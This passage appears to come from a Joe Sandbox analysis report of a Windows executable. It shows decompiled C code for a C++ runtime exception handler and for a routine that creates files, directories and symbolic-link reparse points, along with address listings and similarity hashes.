											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						_t342 = _t270[0x1c];
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00B82AEC(_t270, _t275, _t296, _t301, 0, _t342);
							_t343 =  *((intOrPtr*)(_t224 + 0x10));
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00B82AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
								_t259 = E00B82AEC(_t270, _t275, _t296, _t301, 0, _t343);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0) {
									goto L67;
								} else {
									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
										L16:
										_t261 = E00B82AEC(_t270, _t275, _t296, _t301, _t315, _t350);
										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
											L23:
											_t296 = _v8;
											_t275 = _v12;
											L24:
											_v52 = _t301;
											_v48 = 0;
											__eflags =  *_t270 - 0xe06d7363;
											if( *_t270 != 0xe06d7363) {
												L57:
												__eflags = _t301[3];
												if(__eflags <= 0) {
													goto L60;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L67;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t275);
														_push(_t301);
														_push(_a16);
														_push(_t296);
														_push(_a8);
														_push(_t270);
														L68();
														_t332 = _t332 + 0x20;
														goto L60;
													}
												}
											} else {
												__eflags = _t270[0x10] - 3;
												if(_t270[0x10] != 3) {
													goto L57;
												} else {
													__eflags = _t270[0x14] - 0x19930520;
													if(_t270[0x14] == 0x19930520) {
														L29:
														_t315 = _a32;
														__eflags = _t301[3];
														if(_t301[3] > 0) {
															_push(_a28);
															E00B80894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
															_t296 = _v64;
															_t332 = _t332 + 0x18;
															_t247 = _v68;
															_v44 = _t247;
															_v16 = _t296;
															__eflags = _t296 - _v56;
															if(_t296 < _v56) {
																_t290 = _t296 * 0x14;
																__eflags = _t290;
																_v32 = _t290;
																do {
																	_t291 = 5;
																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																	_t332 = _t332 + 0xc;
																	__eflags = _v104 - _t250;
																	if(_v104 <= _t250) {
																		__eflags = _t250 - _v100;
																		if(_t250 <= _v100) {
																			_t294 = 0;
																			_v20 = 0;
																			__eflags = _v92;
																			if(_v92 != 0) {
																				_t299 = _t270[0x1c];
																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
																				_t252 = _t251 + 4;
																				__eflags = _t252;
																				_v36 = _t252;
																				_t253 = _v88;
																				_v40 =  *_t251;
																				_v24 = _t253;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t327 = _v40;
																					_t314 = _v36;
																					__eflags = _t327;
																					if(_t327 <= 0) {
																						goto L40;
																					} else {
																						while(1) {
																							_push(_t299);
																							_push( *_t314);
																							_t254 =  &_v84;
																							_push(_t254);
																							L87();
																							_t332 = _t332 + 0xc;
																							__eflags = _t254;
																							if(_t254 != 0) {
																								break;
																							}
																							_t299 = _t270[0x1c];
																							_t327 = _t327 - 1;
																							_t314 = _t314 + 4;
																							__eflags = _t327;
																							if(_t327 > 0) {
																								continue;
																							} else {
																								_t294 = _v20;
																								_t253 = _v24;
																								goto L40;
																							}
																							goto L43;
																						}
																						_push(_a24);
																						_push(_v28);
																						E00B82DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																						_t332 = _t332 + 0x30;
																					}
																					L43:
																					_t296 = _v16;
																					goto L44;
																					L40:
																					_t294 = _t294 + 1;
																					_t253 = _t253 + 0x10;
																					_v20 = _t294;
																					_v24 = _t253;
																					__eflags = _t294 - _v92;
																				} while (_t294 != _v92);
																				goto L43;
																			}
																		}
																	}
																	L44:
																	_t296 = _t296 + 1;
																	_t247 = _v44;
																	_t290 = _v32 + 0x14;
																	_v16 = _t296;
																	_v32 = _t290;
																	__eflags = _t296 - _v56;
																} while (_t296 < _v56);
																_t301 = _a20;
																_t315 = _a32;
															}
														}
														__eflags = _a24;
														if(__eflags != 0) {
															_push(1);
															E00B80150(_t270, _t301, _t315, __eflags);
															_t275 = _t270;
														}
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(__eflags < 0) {
															L60:
															_t224 = E00B82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
															__eflags =  *(_t224 + 0x1c);
															if( *(_t224 + 0x1c) != 0) {
																goto L67;
															} else {
																goto L61;
															}
														} else {
															_t228 = _t301[8] >> 2;
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	_push(_t301[7]);
																	_t229 = E00B8384A(_t270, _t301, _t315, _t270);
																	_pop(_t275);
																	__eflags = _t229;
																	if(__eflags == 0) {
																		goto L64;
																	} else {
																		goto L60;
																	}
																} else {
																	goto L54;
																}
															} else {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	goto L60;
																} else {
																	__eflags = _a28;
																	if(__eflags != 0) {
																		goto L60;
																	} else {
																		L54:
																		 *(E00B82AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
																		_t237 = E00B82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
																		_t286 = _v8;
																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																		goto L62;
																	}
																}
															}
														}
													} else {
														__eflags = _t270[0x14] - 0x19930521;
														if(_t270[0x14] == 0x19930521) {
															goto L29;
														} else {
															__eflags = _t270[0x14] - 0x19930522;
															if(_t270[0x14] != 0x19930522) {
																goto L57;
															} else {
																goto L29;
															}
														}
													}
												}
											}
										} else {
											_v16 =  *((intOrPtr*)(E00B82AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
											_t264 = E00B82AEC(_t270, _t275, _t296, _t301, _t315, _t351);
											_push(_v16);
											 *(_t264 + 0x1c) = _t315;
											_t265 = E00B8384A(_t270, _t301, _t315, _t270);
											_pop(_t286);
											if(_t265 != 0) {
												goto L23;
											} else {
												_t301 = _v16;
												_t353 =  *_t301 - _t315;
												if( *_t301 <= _t315) {
													L62:
													E00B87AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
												} else {
													while(1) {
														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
														if(E00B834D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xb9efb4) != 0) {
															goto L63;
														}
														_t315 = _t315 + 0x10;
														_t269 = _v20 + 1;
														_v20 = _t269;
														_t353 = _t269 -  *_t301;
														if(_t269 >=  *_t301) {
															goto L62;
														} else {
															continue;
														}
														goto L63;
													}
												}
												L63:
												_push(1);
												_push(_t270);
												E00B80150(_t270, _t301, _t315, __eflags);
												_t275 =  &_v64;
												E00B834BB( &_v64);
												E00B8238D( &_v64, 0xb9c284);
												L64:
												 *(E00B82AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
												_t231 = E00B82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
												_t275 = _v8;
												 *(_t231 + 0x14) = _v8;
												__eflags = _t315;
												if(_t315 == 0) {
													_t315 = _a8;
												}
												E00B80A87(_t275, _t315, _t270);
												E00B8374A(_a8, _a16, _t301);
												_t234 = E00B83907(_t301);
												_t332 = _t332 + 0x10;
												_push(_t234);
												E00B836C1(_t270, _t275, _t296, _t301, _t315, __eflags);
												goto L67;
											}
										}
									} else {
										_t350 = _t270[0x1c] - _t315;
										if(_t270[0x1c] == _t315) {
											goto L67;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x00b82e31
0x00b82e38
0x00b82e3a
0x00b82e43
0x00b82e49
0x00b82e51
0x00b82e53
0x00b82e56
0x00b82e5c
0x00b831d0
0x00b831d0
0x00b831d5
0x00b831d7
0x00b831d9
0x00b831dc
0x00b831dd
0x00b831e0
0x00b831e6
0x00b83305
0x00b831ec
0x00b831ec
0x00b831ed
0x00b831ee
0x00b831f5
0x00b831f8
0x00b831fb
0x00b83201
0x00b83203
0x00b83208
0x00b8320b
0x00b8320d
0x00b83213
0x00b83215
0x00b8321b
0x00b83230
0x00b83235
0x00b83238
0x00b8323a
0x00b83301
0x00000000
0x00b83302
0x00b8323a
0x00b8321b
0x00b83213
0x00b8320b
0x00b83240
0x00b83243
0x00b83246
0x00b83249
0x00b8324c
0x00b83252
0x00b83264
0x00b83269
0x00b8326c
0x00b8326f
0x00b83272
0x00b83275
0x00b83278
0x00b8327b
0x00000000
0x00000000
0x00b83281
0x00b83281
0x00b83284
0x00b83287
0x00b83296
0x00b83297
0x00b83297
0x00b83299
0x00b8329c
0x00000000
0x00000000
0x00b8329e
0x00b832a1
0x00000000
0x00000000
0x00b832af
0x00b832b1
0x00b832b4
0x00b832b6
0x00b832be
0x00b832be
0x00b832c1
0x00b832c3
0x00b832c5
0x00b832e1
0x00b832e6
0x00b832e9
0x00b832e9
0x00000000
0x00b832c1
0x00b832b8
0x00b832bc
0x00000000
0x00000000
0x00000000
0x00b832ec
0x00b832ef
0x00b832f0
0x00b832f3
0x00b832f6
0x00b832f9
0x00b832fc
0x00b832fc
0x00000000
0x00b83287
0x00b83306
0x00b8330b
0x00b8330c
0x00b8330f
0x00b83312
0x00b83313
0x00b83314
0x00b83315
0x00b83318
0x00b8331a
0x00b83392
0x00b83394
0x00b83394
0x00b8331c
0x00b8331c
0x00b8331f
0x00b83322
0x00000000
0x00b83324
0x00b83324
0x00b83327
0x00b8332a
0x00b83331
0x00b83331
0x00b83334
0x00b83336
0x00b83338
0x00b8336a
0x00b8336a
0x00b8336d
0x00b83374
0x00b83374
0x00b83377
0x00b8337a
0x00b83381
0x00b83381
0x00b83384
0x00b8338b
0x00b8338d
0x00b8338d
0x00b83386
0x00b83386
0x00b83389
0x00000000
0x00000000
0x00b83389
0x00b8337c
0x00b8337c
0x00b8337f
0x00000000
0x00000000
0x00b8337f
0x00b8336f
0x00b8336f
0x00b83372
0x00000000
0x00000000
0x00b83372
0x00b8338e
0x00b8333a
0x00b8333a
0x00b8333a
0x00b8333d
0x00b8333d
0x00b8333f
0x00b83341
0x00000000
0x00000000
0x00b83343
0x00b83345
0x00b83359
0x00b83359
0x00b83347
0x00b83347
0x00b8334a
0x00b8334d
0x00000000
0x00b8334f
0x00b8334f
0x00b83352
0x00b83355
0x00b83357
0x00000000
0x00000000
0x00000000
0x00000000
0x00b83357
0x00b8334d
0x00b83362
0x00b83362
0x00b83364
0x00000000
0x00b83366
0x00b83366
0x00b83366
0x00000000
0x00b83364
0x00b8335d
0x00b8335f
0x00b8335f
0x00000000
0x00b8335f
0x00b8332c
0x00b8332c
0x00b8332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8332f
0x00b8332a
0x00b83322
0x00b83395
0x00b83399
0x00b83399
0x00b82e6b
0x00b82e6b
0x00b82e74
0x00b82f71
0x00b82f71
0x00b82f74
0x00000000
0x00b82ea3
0x00b82ea3
0x00b82ea5
0x00b82ea8
0x00000000
0x00b82eae
0x00b82eae
0x00b82eb3
0x00b82eb6
0x00b8316a
0x00b8316e
0x00b82ebc
0x00b82ec1
0x00b82ec4
0x00b82ec9
0x00b82ed0
0x00b82ed5
0x00000000
0x00b82edb
0x00b82ee1
0x00b82f0d
0x00b82f0d
0x00b82f12
0x00b82f15
0x00b82f79
0x00b82f79
0x00b82f7c
0x00b82f7f
0x00b82f81
0x00b82f84
0x00b82f87
0x00b82f8d
0x00b83139
0x00b83139
0x00b8313c
0x00000000
0x00b8313e
0x00b8313e
0x00b83141
0x00000000
0x00b83147
0x00b83147
0x00b8314a
0x00b8314d
0x00b8314e
0x00b8314f
0x00b83152
0x00b83153
0x00b83156
0x00b83157
0x00b8315c
0x00000000
0x00b8315c
0x00b83141
0x00b82f93
0x00b82f93
0x00b82f97
0x00000000
0x00b82f9d
0x00b82f9d
0x00b82fa4
0x00b82fbc
0x00b82fbc
0x00b82fbf
0x00b82fc2
0x00b82fc8
0x00b82fd8
0x00b82fdd
0x00b82fe0
0x00b82fe3
0x00b82fe6
0x00b82fe9
0x00b82fec
0x00b82fef
0x00b82ff5
0x00b82ff5
0x00b82ff8
0x00b82ffb
0x00b8300a
0x00b8300b
0x00b8300b
0x00b8300d
0x00b83010
0x00b83016
0x00b83019
0x00b8301f
0x00b83021
0x00b83024
0x00b83027
0x00b8302d
0x00b83030
0x00b83035
0x00b83035
0x00b83038
0x00b8303b
0x00b8303e
0x00b83041
0x00b83044
0x00b83049
0x00b8304a
0x00b8304b
0x00b8304c
0x00b8304d
0x00b83050
0x00b83053
0x00b83055
0x00000000
0x00b83057
0x00b83057
0x00b83057
0x00b83058
0x00b8305a
0x00b8305d
0x00b8305e
0x00b83063
0x00b83066
0x00b83068
0x00000000
0x00000000
0x00b8306a
0x00b8306d
0x00b8306e
0x00b83071
0x00b83073
0x00000000
0x00b83075
0x00b83075
0x00b83078
0x00000000
0x00b83078
0x00000000
0x00b83073
0x00b8308c
0x00b83092
0x00b830af
0x00b830b4
0x00b830b4
0x00b830b7
0x00b830b7
0x00000000
0x00b8307b
0x00b8307b
0x00b8307c
0x00b8307f
0x00b83082
0x00b83085
0x00b83085
0x00000000
0x00b8308a
0x00b83027
0x00b83019
0x00b830ba
0x00b830bd
0x00b830be
0x00b830c1
0x00b830c4
0x00b830c7
0x00b830ca
0x00b830ca
0x00b830d3
0x00b830d6
0x00b830d6
0x00b82fef
0x00b830d9
0x00b830dd
0x00b830df
0x00b830e2
0x00b830e8
0x00b830e8
0x00b830f0
0x00b830f5
0x00b8315f
0x00b8315f
0x00b83164
0x00b83168
0x00000000
0x00000000
0x00000000
0x00000000
0x00b830f7
0x00b830fa
0x00b830fd
0x00b83101
0x00b8310f
0x00b83111
0x00b83128
0x00b8312c
0x00b83132
0x00b83133
0x00b83135
0x00000000
0x00b83137
0x00000000
0x00b83137
0x00000000
0x00000000
0x00000000
0x00b83103
0x00b83103
0x00b83105
0x00000000
0x00b83107
0x00b83107
0x00b8310b
0x00000000
0x00b8310d
0x00b83113
0x00b83118
0x00b8311b
0x00b83120
0x00b83123
0x00000000
0x00b83123
0x00b8310b
0x00b83105
0x00b83101
0x00b82fa6
0x00b82fa6
0x00b82fad
0x00000000
0x00b82faf
0x00b82faf
0x00b82fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82fb6
0x00b82fad
0x00b82fa4
0x00b82f97
0x00b82f17
0x00b82f1f
0x00b82f22
0x00b82f27
0x00b82f2b
0x00b82f2e
0x00b82f34
0x00b82f37
0x00000000
0x00b82f39
0x00b82f39
0x00b82f3c
0x00b82f3e
0x00b8316f
0x00b8316f
0x00000000
0x00b82f44
0x00b82f4c
0x00b82f57
0x00000000
0x00000000
0x00b82f60
0x00b82f63
0x00b82f64
0x00b82f67
0x00b82f69
0x00000000
0x00b82f6f
0x00000000
0x00b82f6f
0x00000000
0x00b82f69
0x00b82f44
0x00b83174
0x00b83174
0x00b83176
0x00b83177
0x00b8317e
0x00b83181
0x00b8318f
0x00b83194
0x00b83199
0x00b8319c
0x00b831a1
0x00b831a4
0x00b831a7
0x00b831a9
0x00b831ab
0x00b831ab
0x00b831b0
0x00b831bc
0x00b831c2
0x00b831c7
0x00b831ca
0x00b831cb
0x00000000
0x00b831cb
0x00b82f37
0x00b82f04
0x00b82f04
0x00b82f07
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82f07
0x00b82ee1
0x00b82ed5
0x00b82eb6
0x00b82ea8
0x00b82e74

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B82F50
___TypeMatch.LIBVCRUNTIME ref: 00B8305E
_UnwindNestedFrames.LIBCMT ref: 00B831B0
CallUnexpected.LIBVCRUNTIME ref: 00B831CB
_abort.LIBCMT ref: 00B831D0

Strings

csm, xrefs: 00B82E6E
csm, xrefs: 00B82F87
csm, xrefs: 00B82EDB

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: ec0dc637e1bc30a35175eb70e211f59cc9530a76de0103adfe1f79248b74b0af
Instruction ID: d020a3ae97b416aeae61ad67d3cd9ea8bbdbba5f6e26c8b3fb3eef37ba554d1a
Opcode Fuzzy Hash: ec0dc637e1bc30a35175eb70e211f59cc9530a76de0103adfe1f79248b74b0af
Instruction Fuzzy Hash: 49B15675800209EFCF29FFA4C8859AEBBF5FF14B10F1441AAE8156B222D735DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B66FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B66FA5(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00B7EB78(0xb9279e, _t253);
				E00B7EC50(0x30a8);
				if( *0xba1023 == 0) {
					E00B67A9C(L"SeRestorePrivilege");
					E00B67A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xba1023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00B613BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00B70602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00B83E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00B86088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00B86088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00B86066(_t199, _t236);
				_t112 = E00B83E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L12:
					E00B6A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00B6A231(_t200) != 0) {
						_t186 = E00B6A28F(E00B6A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00B6A1E0();
						} else {
							E00B6A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L21;
						}
						_t201 = 0;
						E00B62021(__eflags, 0x14, 0, _t200);
						E00B66D83(0xba1098, 9);
						goto L42;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L21:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L27:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00B86066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00B86066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L28:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00B69556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00B67A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00B69DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00B69620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00B6A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00B6959A(_t253 - 0x30b4);
											goto L42;
										}
										CloseHandle(_t239);
										E00B62021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L33:
											__eflags = E00B707BC();
											if(__eflags == 0) {
												E00B615C6(_t253 - 0x7c, 0x18);
												E00B715FE(_t253 - 0x7c);
											}
											L35:
											E00B66DCB(0xba1098, __eflags);
											E00B66D83(0xba1098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											goto L38;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L35;
										}
										goto L33;
									}
									E00B66C23(_t200);
									E00B66D83(0xba1098, 9);
									goto L38;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L38;
								}
								goto L27;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00B86066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00B86066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L28;
						}
						E00B66C23(_t200);
						goto L38;
					}
				} else {
					if( *(_t253 - 0xd) != 0) {
						L38:
						_t201 = 0;
						L42:
						E00B615FB(_t253 - 0x2c);
						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
						return _t201;
					}
					_t190 = E00B6BCC3(_t244 + 0x1104);
					_t269 = _t190;
					if(_t190 != 0) {
						goto L38;
					}
					_push(_t244 + 0x1104);
					_push(_t200);
					_push(_t244 + 0x28);
					_push(_t237);
					if(E00B67861(_t269) == 0) {
						goto L38;
					}
					goto L12;
				}
			}

0x00b66faa
0x00b66fb4
0x00b66fc0
0x00b66fc7
0x00b66fd1
0x00b66fd6
0x00b66fd6
0x00b66fe5
0x00b66fe8
0x00b66fed
0x00b66ff0
0x00b67007
0x00b6701a
0x00b6701d
0x00b67025
0x00b67031
0x00b67036
0x00b6703b
0x00b6703e
0x00b67043
0x00b67045
0x00b67045
0x00b6704d
0x00b67057
0x00b6705c
0x00b67061
0x00b67065
0x00b67066
0x00b6706d
0x00b67073
0x00b67073
0x00b67061
0x00b67078
0x00b67084
0x00b67089
0x00b6708f
0x00b67092
0x00b6709c
0x00b670d6
0x00b670e1
0x00b670ee
0x00b670f7
0x00b670fc
0x00b670ff
0x00b67108
0x00b67101
0x00b67101
0x00b67101
0x00b670ff
0x00b67114
0x00b671e1
0x00b671e3
0x00000000
0x00000000
0x00b671ea
0x00b671ef
0x00b671fb
0x00000000
0x00b67127
0x00b67139
0x00b67142
0x00b67155
0x00b6715b
0x00b6715b
0x00b67161
0x00b67164
0x00b67205
0x00b67208
0x00b67213
0x00b67216
0x00b67219
0x00b6721f
0x00b67222
0x00b67228
0x00b6722b
0x00b67239
0x00b6723f
0x00b6724d
0x00b67255
0x00b67258
0x00b6725f
0x00b67274
0x00b67280
0x00b67280
0x00b67283
0x00b67286
0x00b6729e
0x00b672a0
0x00b672a3
0x00b672de
0x00b672e0
0x00b6735d
0x00b67369
0x00b6736d
0x00b67372
0x00b67375
0x00b67386
0x00b67399
0x00b673ac
0x00b673b7
0x00b673c2
0x00b673c7
0x00b673ce
0x00b673d4
0x00b673d4
0x00b673df
0x00b673e1
0x00000000
0x00b673e1
0x00b672e3
0x00b672ee
0x00b672f3
0x00b672f9
0x00b672fc
0x00b67305
0x00b6730a
0x00b6730c
0x00b67313
0x00b6731b
0x00b6731b
0x00b67320
0x00b67327
0x00b67330
0x00b67335
0x00b67338
0x00b67339
0x00b67340
0x00b6734a
0x00b67342
0x00b67342
0x00b67342
0x00000000
0x00b67340
0x00b672fe
0x00b67303
0x00000000
0x00000000
0x00000000
0x00b67303
0x00b672ad
0x00b672b6
0x00000000
0x00b672b6
0x00b6720a
0x00b6720d
0x00000000
0x00000000
0x00000000
0x00b6720d
0x00b6716d
0x00b67170
0x00b67176
0x00b67179
0x00b6717f
0x00b67182
0x00b67190
0x00b67196
0x00b671a4
0x00b671ac
0x00b671af
0x00b671b6
0x00b671cb
0x00000000
